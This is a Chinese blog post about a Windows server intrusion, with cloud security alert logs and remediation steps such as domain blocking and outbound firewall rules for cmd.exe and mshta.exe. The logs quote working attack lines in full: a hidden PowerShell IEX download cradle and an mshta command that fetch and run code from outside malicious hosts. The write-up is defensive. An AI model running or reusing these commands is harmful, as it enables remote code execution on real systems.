百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

国庆遭遇来自美帝shell攻击,看斧哥怎么斩草除根

bigegpt 2024-08-29 11:34 2 浏览

一、攻击源:两大木马站点

http://www.al1baba.club/index.hta

http://t.sectools.io/t/evil.hta

二、攻击路径和原理:

表现1:利用shell下载病毒资源

命令行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://www.al1baba.club:8080/a'))"

进程路径:C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

进程ID:11128

父进程命令行:cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://www.al1baba.club:8080/a'))"

父进程文件路径:C:/Windows/System32/cmd.exe

父进程ID:4056

事件说明:云安全中心检测到您的主机上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关,请及时排查处理。

表现2:利用shell调用mashta绕过防火墙下载病毒资源

命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB

进程路径:C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe

进程ID:15068

父进程命令行:C:/Windows/System32/mshta.exe

父进程文件路径:C:/Windows/System32/mshta.exe

父进程ID:8792

事件说明:云安全中心检测到您的主机上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关,请及时排查处理。

进程异常行为-利用Windows系统文件加载恶意代码已忽略

备注

命令行:mshta http://t.sectools.io/t/evil.hta

进程路径:C:/Windows/System32/mshta.exe

进程ID:8792

父进程ID:10800

事件说明:云安全中心检测到ECS执行的命令极有可能是在利用Windows系统文件加载恶意代码,以此绕过反病毒检测。

?高风险的域名:t.sectools.io

情报标签:恶意下载源

该域名解析的IP:104.27.167.42

事件说明:云盾基于威胁情报数据,检测到您的服务器正在访问一个高风险的域名,这个域名可能是钓鱼网站、僵尸网络组织、矿池地址等不正常域名,这意味着您的服务器可能沦陷,并被黑客控制利用。如果您发现此域名是误报,请忽略本次告警。

解决方案:建议您结合这个域名和域名解析的IP在互联网上的公开信息,或云盾的其他告警详情,快速排查服务器的缺陷,如主机进程日志,计划任务等,并及时修复和加固

URL链接:http://t.sectools.io:8880/whoami

与该URL有关联的漏洞:

User Agent:

恶意文件md5:b77e47cdb630a166527e2cb3efbaca44

事件说明:云盾检测到您的服务器正在通过HTTP请求,尝试连接一个可疑恶意下载源,可能是黑客通过运行指令、恶意进程等方式从远程服务器下载恶意文件,危害服务器安全。如果该操作不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。

解决方案:请及时通过告警详情排查连接恶意下载源的异常指令和恶意进程,排查该恶意URL下载的文件md5是否在服务器上,并及时清理已运行的恶意进程。如果该URL是您自己主动连接的,您可以在控制台点击标记为误报。

三、终极实战方案:

由于该木马主要攻击路径:利用用户登录自动启动cmd,然后调用mshta,最后利用mshta联网访问木马站点下载木马软件,实现对服务器控制,因此我们需要阻断该途径任何环节。

1、多层级应用防火墙封杀阻断对改两个域名的访问,列入黑名单,一般防火墙就会自动识别,自动阻止

2、但是服务器依然有被锁定可能,这样会不断调用系统文件cmd和mshta系统文件去联系木马站点,怎么办?

此时需要做以下几点:

1、找出是否已下载程序,有,清除。

2、杀毒软件阻断cmd以及mshta开机或登录自动启动

3、建立系统防火墙规则,禁止cmd.exe以及mshta.exe系统文件出站访问能力。

4、加强多层级防火墙规则,阻断非服务需要访问的任何出站协议和TCP|UDP端口,阻断任何入站非服务端口。

至此,这两个木马彻底解决。

相关文章:

重大漏洞:泛微E-cology OA系统SQL注入漏洞及解决方案

紧急漏洞小心被黑:泛微BSH组件漏洞攻击及解决方案

相关推荐

Docker篇(二):Docker实战,命令解析

大家好,我是杰哥上周我们通过几个问题,让大家对于Docker有了一个全局的认识。然而,说跟练往往是两个概念。从学习的角度来说,理论知识的学习,往往只是第一步,只有经过实战,才能真正掌握一门技术所以,本...

docker学习笔记——安装和基本操作

今天学习了docker的基本知识,记录一下docker的安装步骤和基本命令(以CentOS7.x为例)一、安装docker的步骤:1.yuminstall-yyum-utils2.yum-con...

不可错过的Docker完整笔记(dockerhib)

简介一、Docker简介Docker是一个开源的应用容器引擎,基于Go语言并遵从Apache2.0协议开源。Docker可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,...

扔掉运营商的 IPTV 机顶盒,全屋全设备畅看 IPTV!

其实现在看电视节目的需求确实大大降低了,折腾也只是为了单纯的让它实现,享受这个过程带来的快乐而已,哈哈!预期构想家里所有设备直接接入网络随时接收并播放IPTV直播(电信点播的节目不是太多,但好在非常稳...

第五节 Docker 入门实践:从 Hello World 到容器操作

一、Docker容器基础运行(一)单次命令执行通过dockerrun命令可以直接在容器中执行指定命令,这是体验Docker最快捷的方式:#在ubuntu:15.10容器中执行ech...

替代Docker build的Buildah简单介绍

Buildah是用于通过较低级别的coreutils接口构建OCI兼容镜像的工具。与Podman相似,Buildah不依赖于Docker或CRI-O之类的守护程序,并且不需要root特权。Builda...

Docker 命令大全(docker命令大全记录表)

容器生命周期管理run-创建并启动一个新的容器。start/stop/restart-这些命令主要用于启动、停止和重启容器。kill-立即终止一个或多个正在运行的容器rm-于删除一个或...

docker常用指令及安装rabbitMQ(docker安装rabbitmq配置环境)

一、docker常用指令启动docker:systemctlstartdocker停止docker:systemctlstopdocker重启docker:systemctlrestart...

使用Docker快速部署Storm环境(docker部署confluence)

Storm的部署虽然不是特别麻烦,但是在生产环境中,为了提高部署效率,方便管理维护,使用Docker来统一管理部署是一个不错的选择。下面是我开源的一个新的项目,一个配置好了storm与mono环境的D...

Docker Desktop安装使用指南:零基础教程

在之前的文章中,我多次提到使用Docker来安装各类软件,尤其是开源软件应用。鉴于不少读者对此有需求,我决定专门制作一期关于Docker安装与使用的详细教程。我主要以Macbook(Mac平台)为例进...

Linux如何成功地离线安装docker(linux离线安装httpd)

系统环境:Redhat7.2和Centos7.4实测成功近期因项目需要用docker,所以记录一些相关知识,由于生产环境是不能直接连接互联网,尝试在linux中离线安装docker。步骤1.下载...

Docker 类面试题(常见问题)(docker面试题目)

Docker常见问题汇总镜像相关1、如何批量清理临时镜像文件?可以使用sudodockerrmi$(sudodockerimages-q-fdanging=true)命令2、如何查看...

面试官:你知道Dubbo怎么优雅上下线的吗?你:优雅上下线是啥?

最近无论是校招还是社招,都进行的如火如荼,我也承担了很多的面试工作,在一次面试过程中,和候选人聊了一些关于Dubbo的知识。Dubbo是一个比较著名的RPC框架,很多人对于他的一些网络通信、通信协议、...

【Docker 新手入门指南】第五章:Hello Word

适合人群:完全零基础新手|学习目标:30分钟掌握Docker核心操作一、准备工作:先确认是否安装成功打开终端(Windows用户用PowerShell或GitBash),输入:docker--...

松勤软件测试:详解Docker,如何用portainer管理Docker容器

镜像管理搜索镜像dockersearch镜像名称拉取镜像dockerpullname[:tag]列出镜像dockerimages删除镜像dockerrmiimage名称或id删除...